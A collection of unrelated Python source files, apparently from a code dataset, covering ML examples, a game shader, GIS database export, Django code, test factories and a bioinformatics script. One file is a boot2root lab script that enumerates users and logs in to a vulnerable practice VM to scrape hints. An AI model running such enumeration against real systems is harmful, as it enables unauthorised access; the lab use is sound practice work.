idx = np.arange(N_all)
np.random.shuffle(idx)
xtrain = inputs[idx[:N]]
ytrain = outputs[idx[:N]]
data = autogp.datasets.DataSet(xtrain, ytrain)
xtest = inputs[idx[N:]]
ytest = outputs[idx[N:]]
# Initialize the Gaussian process.
likelihood = autogp.likelihoods.Gaussian()
kernel = [autogp.kernels.RadialBasis(1)]
inducing_inputs = xtrain
model = autogp.GaussianProcess(likelihood, kernel, inducing_inputs)
# Train the model.
optimizer = tf.train.RMSPropOptimizer(0.005)
model.fit(data, optimizer, loo_steps=50, var_steps=50, epochs=1000)
# Predict new inputs.
ypred, _ = model.predict(xtest)
plt.plot(xtrain, ytrain, '.', mew=2)
plt.plot(xtest, ytest, 'o', mew=2)
plt.plot(xtest, ypred, 'x', mew=2)
plt.show()
| StarcoderdataPython |
3309721 | <filename>Main.py
from ursina import *
dissolve=Shader(language=Shader.GLSL,fragment="""
#version 400
uniform sampler2D p3d_Texture0;
uniform sampler2D noiseTex;
uniform float threshold;
in vec2 uv;
out vec4 color;
void main(){
float noiseVal=texture(noiseTex,uv).x;
if(noiseVal>=threshold){
color=vec4(0,0,0,0);
}
else{
float final_alpha=1;
float alphaVal=threshold-noiseVal;
if(alphaVal<=0.1){
color=vec4(0.3,1,1,(alphaVal*5)/2); //change the color for the dissolving effect over here. first three values are for the color.
}
else{
color=texture(p3d_Texture0,uv);
}
}
}
""")
if __name__=="__main__":
from ursina import *
threshold=1
def update():
global threshold
e.set_shader_input("threshold",threshold)
if threshold>0 and held_keys["space"]:
threshold-=time.dt/10 #change the divisor to slow down or speed up the effect
app=Ursina()
e=Entity(model="cube",texture="brick")
e.shader=dissolve
e.set_shader_input("noiseTex",load_texture("noise2.png")) #put your texture here
plyer=EditorCamera()
app.run()
| StarcoderdataPython |
3394502 | <filename>src/GIS/mammals_distribution.py
import csv
import tqdm
import os
import subprocess
import tqdm
def readFile_index():
filename_list = []
with open('mammal/akernel_density.csv', newline='') as csvfile:
csvfile = csv.reader(csvfile, delimiter=',', quotechar='"')
for row in csvfile:
if (len(row ) > 0):
filename_list.append(row[0])
filename_list.remove('data')
filename_list.remove('mammals')
filename_list.pop()
#print(filename_list)
#print(len(filename_list))
return filename_list
name_list = readFile_index()
#print(name_list)
def extract_contour(inputFilePath, outputPath, fileName):
gdal_contour = "/usr/bin/gdal_contour"
if not os.path.exists(inputFilePath):
print("input File Path does not exist")
return False
directoryName = os.path.basename(inputFilePath)
directory = directoryName[:-4]
outputPath = os.path.join(outputPath,directory)
if not os.path.exists(outputPath):
os.mkdir(outputPath)
fileName = fileName + ".shp"
outputPath = os.path.join(outputPath, fileName)
export = subprocess.Popen([gdal_contour, "-a", "sightings", "-i", "1", "-f", "ESRI Shapefile", inputFilePath, outputPath])
export.wait()
return True
"""
inputFilePath = "mammal/KD3.tif"
outputPath = "./"
fileName = name_list[1]
status = extract_contour(inputFilePath,outputPath,fileName)
if(status == True):
print("done")
"""
def export2DB(filePath):
ogr2ogr = "/usr/bin/ogr2ogr"
#ogr2ogr -f "MySQL" MYSQL:"crabnet,host=localhost,user=admin,password=<PASSWORD>,port=3306" -a_srs "EPSG:4326" ‘/home/pat/PecheFantome/data/Zones Protegees MPO/DFO_MPA_MPO_ZPM.shp’
export = subprocess.Popen([ogr2ogr, "-f", "MYSQL", "MYSQL:crabnet,host=localhost,user=admin,password=<PASSWORD>,port=3306", "-a_srs", "EPSG:4326", filePath])
if (export.wait() != 0):
return False
else:
return True
"""
status = export2DB()
if(status == True):
print("export to db done")
"""
tif_fileList = []
tifs_path = "./mammal"
for tif in os.listdir(tifs_path):
if tif.endswith(".tif"):
tif_fileList.append(tif)
tif_fileList.sort()
tif_fileList.remove("KD_all_mammals.tif")
print(tif_fileList)
for i in range(len(tif_fileList)):
index = tif_fileList[i]
index = index[2:-4]
index = int(index)-2
output_fileName = name_list[index]
outputPath = "."
input_file = os.path.join("./mammal",tif_fileList[i])
if (extract_contour(input_file, outputPath, output_fileName)):
print(output_fileName, " created")
path = tif_fileList[i]
path = path[:-4]
output_fileName += ".shp"
shapefile_path = os.path.join(path,output_fileName)
if(export2DB(shapefile_path)):
print(shapefile_path, " exported")
| StarcoderdataPython |
3201148 | <gh_stars>1-10
GIT_SUBDIR = "privacy" # subdir in .git used for storing state
| StarcoderdataPython |
3347821 | <gh_stars>0
from factory import Faker, LazyAttribute, Maybe, SubFactory, lazy_attribute
from ..core.factories import DjangoModelFactory
from . import models
AUTO_QUESTION_TYPES = [
t
for t in models.Question.TYPE_CHOICES
if t
not in [
models.Question.TYPE_STATIC,
models.Question.TYPE_FORM,
models.Question.TYPE_DYNAMIC_CHOICE,
models.Question.TYPE_DYNAMIC_MULTIPLE_CHOICE,
]
]
class FormFactory(DjangoModelFactory):
slug = Faker("slug")
name = Faker("multilang", faker_provider="name")
description = Faker("multilang", faker_provider="text")
meta = {}
is_published = False
is_archived = False
class Meta:
model = models.Form
class QuestionFactory(DjangoModelFactory):
slug = Faker("slug")
label = Faker("multilang", faker_provider="name")
type = Faker("word", ext_word_list=AUTO_QUESTION_TYPES)
is_required = "true"
is_hidden = "false"
configuration = {}
meta = {}
is_archived = False
format_validators = []
row_form = Maybe(
"is_table", yes_declaration=SubFactory(FormFactory), no_declaration=None
)
sub_form = Maybe(
"is_form", yes_declaration=SubFactory(FormFactory), no_declaration=None
)
static_content = Maybe(
"is_static",
yes_declaration=Faker("multilang", faker_provider="text"),
no_declaration=None,
)
data_source = Maybe(
"is_dynamic", yes_declaration="MyDataSource", no_declaration=None
)
class Meta:
model = models.Question
class Params:
is_table = LazyAttribute(lambda q: q.type == models.Question.TYPE_TABLE)
is_form = LazyAttribute(lambda q: q.type == models.Question.TYPE_FORM)
is_dynamic = LazyAttribute(
lambda q: q.type
in [
models.Question.TYPE_DYNAMIC_CHOICE,
models.Question.TYPE_DYNAMIC_MULTIPLE_CHOICE,
]
)
is_static = LazyAttribute(lambda q: q.type == models.Question.TYPE_STATIC)
class OptionFactory(DjangoModelFactory):
slug = Faker("slug")
label = Faker("multilang", faker_provider="name")
is_archived = False
meta = {}
class Meta:
model = models.Option
class QuestionOptionFactory(DjangoModelFactory):
option = SubFactory(OptionFactory)
question = SubFactory(QuestionFactory)
sort = 0
class Meta:
model = models.QuestionOption
class FormQuestionFactory(DjangoModelFactory):
form = SubFactory(FormFactory)
question = SubFactory(QuestionFactory)
sort = 0
class Meta:
model = models.FormQuestion
class DocumentFactory(DjangoModelFactory):
form = SubFactory(FormFactory)
family = None
meta = {}
class Meta:
model = models.Document
class FileFactory(DjangoModelFactory):
name = Faker("file_name")
class Meta:
model = models.File
class AnswerFactory(DjangoModelFactory):
question = SubFactory(QuestionFactory)
document = SubFactory(DocumentFactory)
meta = {}
@lazy_attribute
def value(self):
if (
self.question.type == models.Question.TYPE_MULTIPLE_CHOICE
or self.question.type == models.Question.TYPE_DYNAMIC_MULTIPLE_CHOICE
):
return [Faker("name").generate({}), Faker("name").generate({})]
elif self.question.type == models.Question.TYPE_FLOAT:
return Faker("pyfloat").generate({})
elif self.question.type == models.Question.TYPE_INTEGER:
return Faker("pyint").generate({})
elif self.question.type not in [
models.Question.TYPE_TABLE,
models.Question.TYPE_FILE,
models.Question.TYPE_DATE,
]:
return Faker("name").generate({})
return None
file = Maybe(
"is_file", yes_declaration=SubFactory(FileFactory), no_declaration=None
)
date = Maybe("is_date", yes_declaration=Faker("date"), no_declaration=None)
class Meta:
model = models.Answer
class Params:
is_file = LazyAttribute(lambda a: a.question.type == models.Question.TYPE_FILE)
is_date = LazyAttribute(lambda a: a.question.type == models.Question.TYPE_DATE)
class AnswerDocumentFactory(DjangoModelFactory):
answer = SubFactory(AnswerFactory)
document = SubFactory(DocumentFactory)
sort = 0
class Meta:
model = models.AnswerDocument
| StarcoderdataPython |
3210412 | <filename>Boot2Root/vulnhub/Trollcave-v1-2/scripts/user-hint-enum.py
import requests
import re
def GetUserByID(id):
response = (requests.get('http://192.168.1.30/users/' + str(id)).text).strip()
# Match <a href="/send_pm?recipient_name=King">PM</a>
username = re.search('recipient_name=(.*?)"', response).group(1)
return username
def GetRoleByID(id):
response = (requests.get('http://192.168.1.30/users/' + str(id)).text).strip()
"""
<div class='user-info'>
<b>
Superadmin
</b>
"""
role = re.search('>\x0A<b>\x0A(.*?)\x0A</b>', response).group(1)
return role
def GetHintByID(id):
username = GetUserByID(id)
cookie = {'_thirtytwo_session':'RHZ0Q2ZlY0hXaExlbjh5bUw0QkladzBSVTBQaHhBVzlKUWpqRGtTcHZlSDJTZjRaY0pkL3lWNDl4aXBaa1owdDllbnNQK1lzd2ZVMjBZNTdZUnNSRERnQTFRaUREMlVtWkNiQ0R5c1R3YmxMNjdacWJjbWszOS9MVGdralJtNnFRTmR4WTF1b2JSR2hWaWZtSWdxOW5yL1ZoZVBGMW9rMGNZMWxDQ3VVWFViRUtVUk10S05sa0IzZVJWclI3K2NLcEVUOW5hUnBjcW1XQWFyZ1phZkdwbGV0SlhQeWo2VkF3Ykc0dnNaNUp5OD0tLWtxUmM4T3o4SGQ3N251bnNvdHVyb1E9PQ%3D%3D--540a8dc376ed2b26f7f47ae7cbde2e40b88ebb79'}
payload = {'authenticity_token':'<KEY>', 'session[name]':username, 'session[password]':'<PASSWORD>', 'commit': 'Log in'}
response = (requests.post('http://192.168.1.30/login/', data=payload, cookies=cookie).text).strip()
hint = re.search('notice\'>(.*?)<', response).group(1)
return username, hint
for i in range(0,20):
try:
username, hint = GetHintByID(i)
print(username + "\t" + hint)
except:
None
| StarcoderdataPython |
1756896 | from django.urls import path
from . import views
urlpatterns = [
path('', views.Index.as_view(), name="index"),
# <pk>にPostのIDを渡すと表示される。
path('detail/<pk>/', views.Detail.as_view(), name="detail"), #ここのnameはURLを変数として用いるときの変数名になる <pk>というのはidに対応
path('create/', views.Create.as_view(), name='create'),
path('update/<pk>', views.Update.as_view(), name="update"),
path('delete/<pk>', views.Delete.as_view(), name="delete"),
] | StarcoderdataPython |
3320963 | import os
import yaml
from .alerts import Alert
def contents_of_file(filename):
open_file = open(filename)
contents = open_file.read()
open_file.close()
return contents
def get_config(path):
return Config(path)
class Config(object):
def __init__(self, path):
alert_yml = contents_of_file(path)
self._data = yaml.load(alert_yml, Loader=yaml.SafeLoader)
def data(self, key):
return self._data.get(key)
def get(self, key, default=None):
return os.environ.get(key, self._data.get(key.lower(), default))
def has(self, key):
value = None
_key = key.lower()
if _key in self._data:
value = self._data[_key]
elif key in os.environ:
value = os.environ.get(key, None)
return value is not None and value != ''
def alerts(self):
alerts = []
doc_url = self._data.get('docs_url')
for alert_string in self._data.get('alerts'):
alerts.append(Alert(alert_string, doc_url))
return alerts
def has_keys(self, keys):
for key in keys:
if self.has(key) is False:
return False
return True
| StarcoderdataPython |
194332 | # Image augmentation with ImageDataGenerator
# Steps
# 1. Prepare images dataset
# 2. create ImageDataGenerator
# 3. Create iterators flow() or flow_from_directory(...)
# 4. Fit
# Horizontal shift image augmentation
from PIL import Image
from numpy import expand_dims
from keras.preprocessing.image import load_img, img_to_array, ImageDataGenerator
from matplotlib import pyplot
img = load_img('bird.jpg')
data = img_to_array(img)
# expand dimension to one sample
samples = expand_dims(data, 0)
dgen = ImageDataGenerator(horizontal_flip=True)
# make iterator
it = dgen.flow(samples, batch_size=1)
# gen samples and plot
for i in range(9):
pyplot.subplot(330 + 1 + i)
# Generate batch of images
batch = it.next()
# convert to unsigned ints for viewing
image = batch[0].astype('uint8')
pyplot.imshow(image)
pyplot.show() | StarcoderdataPython |
84462 | print(3 // 7)
| StarcoderdataPython |
1787093 | <gh_stars>1-10
import collections
import time
import ocs
from ocs import site_config
def _get_op(op_type, name, encoded, client):
"""Factory for generating matched operations. This will make sure
op.start's docstring is the docstring of the operation.
Parameters:
op_type (str): Operation type, either 'task' or 'process'.
name (str): Operation name
encoded (dict): Encoded :class:`ocs.ocs_agent.AgentTask` or
:class:`ocs.ocs_agent.AgentProcess` dictionary.
client (ControlClient): Client object, which will be used to issue the
requests for operation actions.
"""
class MatchedOp:
def start(self, **kwargs):
return OCSReply(*client.request('start', name, params=kwargs))
def wait(self, timeout=None):
return OCSReply(*client.request('wait', name, timeout=timeout))
def status(self):
return OCSReply(*client.request('status', name))
class MatchedTask(MatchedOp):
def abort(self):
return OCSReply(*client.request('abort', name))
def __call__(self, **kw):
"""Runs self.start(**kw) and, if that succeeds, self.wait()."""
result = self.start(**kw)
if result[0] != ocs.OK:
return result
return self.wait()
class MatchedProcess(MatchedOp):
def stop(self):
return OCSReply(*client.request('stop', name))
def __call__(self):
"""Equivalent to self.status()."""
return self.status()
MatchedOp.start.__doc__ = encoded['docstring']
if op_type == 'task':
return MatchedTask()
elif op_type == 'process':
return MatchedProcess()
else:
raise ValueError("op_type must be either 'task' or 'process'")
def _opname_to_attr(name):
for c in ['-', ' ']:
name = name.replace(c, '_')
return name
class OCSClient:
"""The simple OCS Client, facilitating task/process calls.
OCSClient makes an Agent's tasks/processes available as class attributes,
making it easy to setup a client instance and call the associated Agent's
tasks and processes.
Example:
This example sets up an OCSClient object and calls a FakeDataAgent's
Task (delay_task) and process (acq)::
>>> client = OCSClient('fake-data-1')
>>> client.delay_task(delay=5)
>>> client.acq.start()
Attributes:
instance_id (str): instance-id for agent to run
"""
def __init__(self, instance_id, **kwargs):
"""
Args:
instance_id (str): Instance id for agent to run
args (list or args object, optional):
Takes in the parser arguments for the client.
If None, pass an empty list.
If list, reads in list elements as arguments.
Defaults to None.
.. note::
For additional ``**kwargs`` see site_config.get_control_client.
"""
if kwargs.get('args') is None:
kwargs['args'] = []
self._client = site_config.get_control_client(instance_id, **kwargs)
self.instance_id = instance_id
self._api = self._client.get_api()
for name, _, encoded in self._api['tasks']:
setattr(self, _opname_to_attr(name),
_get_op('task', name, encoded, self._client))
for name, _, encoded in self._api['processes']:
setattr(self, _opname_to_attr(name),
_get_op('process', name, encoded, self._client))
def _humanized_time(t):
if abs(t) < 1.:
return '%.6f s' % t
if abs(t) < 120:
return '%.1f s' % t
if abs(t) < 120*60:
return '%.1f mins' % (t / 60)
if abs(t) < 48*3600:
return '%.1f hrs' % (t / 3600)
return '%.1f days' % (t / 86400)
class OCSReply(collections.namedtuple('_OCSReply',
['status', 'msg', 'session'])):
def __repr__(self):
try:
ok_str = ocs.ResponseCode(self.status).name
except ValueError:
ok_str = '???'
text = 'OCSReply: %s : %s\n' % (ok_str, self.msg)
if self.session is None or len(self.session.keys()) == 0:
return text + ' (no session -- op has never run)'
# try/fail in here so we can make assumptions about key
# presence and bail out to a full dump if anything is weird.
try:
handled = ['op_name', 'session_id', 'status', 'start_time',
'end_time', 'messages', 'success']
s = self.session
run_str = 'status={status}'.format(**s)
if s['status'] in ['starting', 'running']:
run_str += ' for %s' % _humanized_time(
time.time() - s['start_time'])
elif s['status'] == 'done':
if s['success']:
run_str += ' without error'
else:
run_str += ' with ERROR'
run_str += ' %s ago, took %s' % (
_humanized_time(time.time() - s['end_time']),
_humanized_time(s['end_time'] - s['start_time']))
text += (' {op_name}[session={session_id}]; '
'{run_str}\n'.format(run_str=run_str, **s))
messages = s.get('messages', [])
if len(messages):
to_show = min(5, len(messages))
text += (' messages (%i of %i):\n' % (to_show, len(messages)))
for m in messages:
text += ' %.3f %s\n' % (m[0], m[1])
also = [k for k in s.keys() if k not in handled]
if len(also):
text += (' other keys in .session: ' + ', '.join(also))
except Exception as e:
text += ('\n [session decode failed with exception: %s\n'
' Here is everything in .session:\n %s\n]') \
% (e.args, self.session)
return text
| StarcoderdataPython |
145748 | <reponame>Mitul-Joby/Semester-1-Python-Lab
def Length(L):
C = 0
for _ in L:
C+=1
return C
N = int(input('\nEnter number of elements in list to be entered: '))
L = []
for i in range(0,N):
L.append(input('Enter an element: '))
print('\nLength of list:',Length(L)) | StarcoderdataPython |
1774917 | # Semana 7
# Exercício 1
# <NAME>
# Escreva um programa que recebe como entradas dois números inteiros correspondentes à largura e à altura de um retângulo;
# O programa deve imprimir uma cadeira de caracteres que represente o retângulo informado com caracteres "#" na saída.
# Dica: a função print pode receber um parâmetro "end", que altera o último caractere da cadeia, tornando possível a remoção
# da quebra de linha.
x = int(input("Digite a largura do retângulo:"))
y = int(input("Digite a altura do retângulo:"))
a = 1
while a <=y :
print("#" * x, end="")
print()
a += 1
| StarcoderdataPython |
33754 | <filename>src/models/predict_text_model.py
from ast import literal_eval
from performance_metrics import get_performance_metrics
from tensorflow.keras.models import load_model
import os
os.environ['TF_CPP_MIN_LOG_LEVEL'] = '1' # Ignore tf info messages
import pandas as pd
if __name__ == "__main__":
TASK = "humanitarian"
print("\nLoading in testing data...")
# Read in testing data
test_filepath = f"../../data/interim/task_{TASK}_test_preprocessed_text.csv"
test_df = pd.read_csv(test_filepath)
# Extract data and labels from dataset
test_X = list(test_df["padded_sequence"].apply(literal_eval))
test_y = list(test_df["onehot_label"].apply(literal_eval))
print("\nLoading in trained model...")
# Load in trained model
trained_model = load_model(f"../../models/text/{TASK}/{TASK}.hdf5")
print(trained_model.summary())
print("\nPredicting testing data...")
# Predict testing data using trained model
pred_y = trained_model.predict(test_X, batch_size=128)
print("\nGetting performance metrics...")
# Get performance metrics
get_performance_metrics(test_y, pred_y, test_df, TASK, "text")
| StarcoderdataPython |
66333 | import random
from typing import Any, Dict, List, Optional, Type
from mathy_core.expressions import MathExpression
from mathy_core.problems import get_rand_term_templates, mathy_term_string
from mathy_core.rule import BaseRule
from mathy_core.rules import (
AssociativeSwapRule,
CommutativeSwapRule,
ConstantsSimplifyRule,
DistributiveFactorOutRule,
DistributiveMultiplyRule,
VariableMultiplyRule,
)
from mathy_core.util import TermEx, get_term_ex, get_terms
from .. import time_step
from ..env import MathyEnvProblem
from ..state import MathyEnvState, MathyEnvStateStep, MathyObservation
from ..types import EnvRewards, MathyEnvDifficulty, MathyEnvProblemArgs
from .poly_simplify import PolySimplify
class PolyHaystackLikeTerms(PolySimplify):
"""Act on any node in the expression that has another term like it
somewhere else. For example in the problem:
2x + 8 + 13.2y + z^2 + 5x
^^---------------------^^
Applying any rule to one of those nodes is a win. The idea here is that
in order to succeed at this task, the model must build a representation
that can identify like terms in a large expression tree.
"""
def __init__(self, **kwargs: Any):
super(PolyHaystackLikeTerms, self).__init__(**kwargs)
def get_env_namespace(self) -> str:
return "mathy.polynomials.haystack.like.terms"
def get_penalizing_actions(self, state: MathyEnvState) -> List[Type[BaseRule]]:
return [
CommutativeSwapRule,
AssociativeSwapRule,
DistributiveFactorOutRule,
DistributiveMultiplyRule,
ConstantsSimplifyRule,
VariableMultiplyRule,
]
def max_moves_fn(
self, problem: MathyEnvProblem, config: MathyEnvProblemArgs
) -> int:
return problem.complexity
def transition_fn(
self,
env_state: MathyEnvState,
expression: MathExpression,
features: MathyObservation,
) -> Optional[time_step.TimeStep]:
"""If all like terms are siblings."""
agent = env_state.agent
if len(agent.history) == 0:
return None
# History gets pushed before this fn, so history[-1] is the current state,
# and history[-2] is the previous state. Find the previous state node we
# acted on, and compare to that.
curr_timestep: MathyEnvStateStep = agent.history[-1]
last_timestep: MathyEnvStateStep = agent.history[-2]
expression = self.parser.parse(last_timestep.raw)
action_node = self.get_token_at_index(expression, curr_timestep.action[1])
touched_term = get_term_ex(action_node)
term_nodes = get_terms(expression)
# We have the token_index of the term that was acted on, now we have to see
# if that term has any like siblings (not itself). We do this by ignoring the
# term with a matching r_index to the node the agent acted on.
#
# find_nodes updates the `r_index` value on each node which is the token index
BaseRule().find_nodes(expression)
like_counts: Dict[str, int] = {}
all_indices: Dict[str, List[int]] = {}
max_index = 0
for term_node in term_nodes:
assert term_node is not None and term_node.r_index is not None
max_index = max(max_index, term_node.r_index)
ex: Optional[TermEx] = get_term_ex(term_node)
if ex is None:
continue
key = mathy_term_string(variable=ex.variable, exponent=ex.exponent)
if key == "":
key = "const"
if key not in like_counts:
like_counts[key] = 1
else:
like_counts[key] += 1
if key not in all_indices:
all_indices[key] = [term_node.r_index]
else:
all_indices[key].append(term_node.r_index)
like_indices: Optional[List[int]] = None
for key in all_indices.keys():
if len(all_indices[key]) > 1:
like_indices = all_indices[key]
if action_node is not None and touched_term is not None:
touched_key = mathy_term_string(
variable=touched_term.variable, exponent=touched_term.exponent
)
if touched_key in like_counts and like_counts[touched_key] > 1:
action_node.all_changed()
return time_step.termination(features, self.get_win_signal(env_state))
if env_state.agent.moves_remaining <= 0:
distances = []
if like_indices is not None:
assert action_node is not None and action_node.r_index is not None
for index in like_indices:
distances.append(abs(index - action_node.r_index))
loss_magnitude = min(distances) / max_index
else:
loss_magnitude = 1.0
lose_signal = EnvRewards.LOSE - loss_magnitude
return time_step.termination(features, lose_signal)
return None
def make_problem(
self,
min_terms: int,
max_terms: int,
like_terms: int,
exponent_probability: float,
) -> str:
assert min_terms <= max_terms, "min cannot be greater than max"
assert like_terms < min_terms, "must have atleast one term that is not like"
out_terms = []
total_terms = random.randint(min_terms, max_terms)
num_diff_terms = total_terms - like_terms
diff_term_tpls = get_rand_term_templates(
num_diff_terms + 1, exponent_probability=exponent_probability
)
like_term_tpl = diff_term_tpls[-1]
diff_term_tpls = diff_term_tpls[:-1]
for i in range(like_terms):
out_terms.append(like_term_tpl.make())
for tpl in diff_term_tpls:
out_terms.append(tpl.make())
random.shuffle(out_terms)
problem = " + ".join(out_terms)
return problem
def problem_fn(self, params: MathyEnvProblemArgs) -> MathyEnvProblem:
if params.difficulty == MathyEnvDifficulty.easy:
text = self.make_problem(
min_terms=3, max_terms=8, like_terms=2, exponent_probability=0.3
)
elif params.difficulty == MathyEnvDifficulty.normal:
text = self.make_problem(
min_terms=4, max_terms=7, like_terms=2, exponent_probability=0.5
)
elif params.difficulty == MathyEnvDifficulty.hard:
text = self.make_problem(
min_terms=5, max_terms=12, like_terms=2, exponent_probability=0.4
)
else:
raise ValueError(f"Unknown difficulty: {params.difficulty}")
return MathyEnvProblem(text, 2, self.get_env_namespace())
| StarcoderdataPython |
3232297 | from FileSystemItem import FileSystemItem
class File(FileSystemItem):
def __init__(self, size):
self.size = size
def get_size(self):
return self.size
| StarcoderdataPython |
82628 | <filename>scripts/check_enumerative_guesses.py<gh_stars>0
#!/usr/bin/python
import os
import subprocess
import sys
import time
import re
import itertools
import json
num_instrs = [1, 2, 3]
files = ['enum0.opt', 'enum1.opt']
dataflows = ['false']
configs = itertools.product(num_instrs, files, dataflows)
# 0 - num-instrs, 1 - filename, 2 - dataflow
output_lines = []
for conf in configs:
cmd_enum = "./souper-check -z3-path=\"../third_party/z3-install/bin/z3\" -souper-enumerative-synthesis-debug-level=2 -solver-timeout=60 -infer-rhs -souper-enumerative-synthesis -souper-enumerative-synthesis-num-instructions=%d -souper-dataflow-pruning=%s -souper-enumerative-synthesis-skip-solver %s" % (conf[0], conf[2], conf[1])
time_start = time.time()
output = subprocess.check_output(cmd_enum, stderr=subprocess.STDOUT, shell=True)
time_end = time.time()
guesses = re.search('There are.*Guesses', output).group()
dataflowpruned = re.search('Dataflow Pruned .*', output).group()
output_lines.append('For %s(%d): (took %f seconds). [%s]' % (conf[1], conf[0], round(time_end - time_start, 2), guesses))
data = dict()
data['body'] = '\n'.join(output_lines)
print(json.dumps(data))
| StarcoderdataPython |
3211951 | from model.Bacteria import Bacteria
class Anaerobs(Bacteria):
def __init__(self):
self.metabolismType = "Anaerob"
| StarcoderdataPython |
1708782 | <filename>majora2/migrations/0075_auto_20200505_1806.py
# Generated by Django 2.2.10 on 2020-05-05 18:06
from django.db import migrations, models
class Migration(migrations.Migration):
dependencies = [
('majora2', '0074_temporarymajoraartifactmetric_thresholdcycle_temporarymajoraartifactmetricrecord_temporarymajoraarti'),
]
operations = [
migrations.AlterField(
model_name='temporarymajoraartifactmetricrecord_thresholdcycle',
name='ct_value',
field=models.FloatField(blank=True, null=True),
),
]
| StarcoderdataPython |
1794213 | #!/usr/bin/env python
# Update the total number of annotations and experiments each term appears in
'''Update the total number of annotations and experiments each term appears in
'''
import sys
import argparse
import psycopg2
import psycopg2.extras
import setproctitle
from collections import defaultdict
from dbbact_server import db_access
from dbbact_server.utils import debug, SetDebugLevel
__version__ = "0.9"
def update_term_info(con, cur):
cur2 = con.cursor(cursor_factory=psycopg2.extras.DictCursor)
debug(3, 'update_term_info started')
debug(2, 'dropping old TermInfoTable')
cur.execute('DELETE FROM TermInfoTable')
debug(2, 'processing annotations')
term_pos_exps = defaultdict(set)
term_neg_exps = defaultdict(set)
term_pos_anno = defaultdict(set)
term_neg_anno = defaultdict(set)
all_term_ids = set()
# iterate all annotationes / annotationsdetails
cur.execute('SELECT id, idexp FROM AnnotationsTable')
for idx, cres in enumerate(cur):
cannoid = cres['id']
cexp = cres['idexp']
if idx % 1000 == 0:
debug(2, 'processing annotation %d' % cannoid)
cur2.execute('SELECT idontology, idannotationdetail FROM AnnotationListTable WHERE idannotation=%s', [cannoid])
for cdres in cur2:
ctype = cdres['idannotationdetail']
ctermid = cdres['idontology']
all_term_ids.add(ctermid)
# if LOWER IN
if ctype == 2:
term_neg_exps[ctermid].add(cexp)
term_neg_anno[ctermid].add(cannoid)
else:
term_pos_exps[ctermid].add(cexp)
term_pos_anno[ctermid].add(cannoid)
debug(3, 'Found %d terms' % len(all_term_ids))
debug(2, 'adding stats to TermInfoTable')
for ctermid in all_term_ids:
cur2.execute('SELECT description FROM OntologyTable WHERE id=%s LIMIT 1', [ctermid])
if cur2.rowcount == 0:
debug(5, 'no term name in OntologyTable for termid %d. skipping' % ctermid)
continue
res = cur2.fetchone()
cterm = res[0]
tot_exps_pos = len(term_pos_exps[ctermid])
tot_anno_pos = len(term_pos_anno[ctermid])
tot_exps_neg = len(term_neg_exps[ctermid])
tot_anno_neg = len(term_neg_anno[ctermid])
if ctermid in term_pos_exps:
# test if we already have the term in the terminfotable
# if the term was already added (so same term name with 2 different term_ids (from 2 ontologies) in different annotations)
# we want to agglomerate the count
cur2.execute('SELECT TotalExperiments, TotalAnnotations FROM TermInfoTable WHERE term=%s LIMIT 1', [cterm])
if cur2.rowcount > 0:
res = cur2.fetchone()
debug(2, 'already found %s' % cterm)
tot_exps_pos += res[0]
tot_anno_pos += res[1]
cur2.execute('DELETE FROM TermInfoTable WHERE term=%s', [cterm])
cur2.execute('INSERT INTO TermInfoTable (term, TotalExperiments, TotalAnnotations,TermType) VALUES (%s, %s, %s, %s)', [cterm, tot_exps_pos, tot_anno_pos, 'single'])
if ctermid in term_neg_exps:
# test if we already have the term in the terminfotable
# if the term was already added (so same term name with 2 different term_ids (from 2 ontologies) in different annotations)
# we want to agglomerate the count
cur2.execute('SELECT TotalExperiments, TotalAnnotations FROM TermInfoTable WHERE term=%s LIMIT 1', ['-' + cterm])
if cur2.rowcount > 0:
res = cur2.fetchone()
debug(2, 'already found -%s' % cterm)
tot_exps_neg += res[0]
tot_anno_neg += res[1]
cur2.execute('DELETE FROM TermInfoTable WHERE term=%s', ['-' + cterm])
cur2.execute('INSERT INTO TermInfoTable (term, TotalExperiments, TotalAnnotations,TermType) VALUES (%s, %s, %s, %s)', ['-' + cterm, tot_exps_neg, tot_anno_neg, 'single'])
debug(2, 'committing')
con.commit()
debug(3, 'done')
def update_term_info_old(con, cur):
cur2 = con.cursor(cursor_factory=psycopg2.extras.DictCursor)
cur3 = con.cursor(cursor_factory=psycopg2.extras.DictCursor)
debug(3, 'update_term_info started')
debug(2, 'dropping old TermInfoTable')
cur.execute('DELETE FROM TermInfoTable')
debug(2, 'processing terms')
cur.execute('SELECT id,description FROM OntologyTable')
for idx, cres in enumerate(cur):
term_exps_pos = set()
term_exps_neg = set()
term_annotations_pos = set()
term_annotations_neg = set()
ctermid = cres['id']
cterm = cres['description']
# get all the annotations containing this term
cur2.execute('SELECT idannotation,idannotationdetail FROM AnnotationListTable WHERE idontology=%s', [ctermid])
for ctres in cur2:
ctype = ctres['idannotationdetail']
cannotation = ctres['idannotation']
# get more info about the annotation
cur3.execute('SELECT idexp FROM AnnotationsTable WHERE id=%s LIMIT 1', [cannotation])
cares = cur3.fetchone()
cexp = cares['idexp']
# if it's "LOWER IN cterm" it is neg
if ctype == 2:
term_exps_neg.add(cexp)
term_annotations_neg.add(cannotation)
else:
term_exps_pos.add(cexp)
term_annotations_pos.add(cannotation)
cur2.execute('INSERT INTO TermInfoTable (term, TotalExperiments, TotalAnnotations,TermType) VALUES (%s, %s, %s, %s)', [cterm, len(term_exps_pos), len(term_annotations_pos), 'single'])
cur2.execute('INSERT INTO TermInfoTable (term, TotalExperiments, TotalAnnotations,TermType) VALUES (%s, %s, %s, %s)', ['-' + cterm, len(term_exps_neg), len(term_annotations_neg), 'single'])
if idx % 1000 == 0:
debug(2, 'processed term %d: %s. pos exps %d, pos anno %d, neg exps %d, neg anno %d' % (idx, cterm, len(term_exps_pos), len(term_annotations_pos), len(term_exps_neg), len(term_annotations_neg)))
if cterm == 'small village':
debug(2, 'processed term %d: %s. pos exps %d, pos anno %d, neg exps %d, neg anno %d' % (idx, cterm, len(term_exps_pos), len(term_annotations_pos), len(term_exps_neg), len(term_annotations_neg)))
debug(2, 'committing')
con.commit()
debug(3, 'done')
def main(argv):
parser = argparse.ArgumentParser(description='Add annotation/experiment counts to all dbbact sequences. version ' + __version__)
parser.add_argument('--port', help='postgres port', default=5432, type=int)
parser.add_argument('--host', help='postgres host', default=None)
parser.add_argument('--database', help='postgres database', default='dbbact')
parser.add_argument('--user', help='postgres user', default='dbbact')
parser.add_argument('--password', help='postgres password', default='<PASSWORD>')
parser.add_argument('--proc-title', help='name of the process (to view in ps aux)')
parser.add_argument('--debug-level', help='debug level (1 for debug ... 9 for critical)', default=2, type=int)
args = parser.parse_args(argv)
SetDebugLevel(args.debug_level)
# set the process name for ps aux
if args.proc_title:
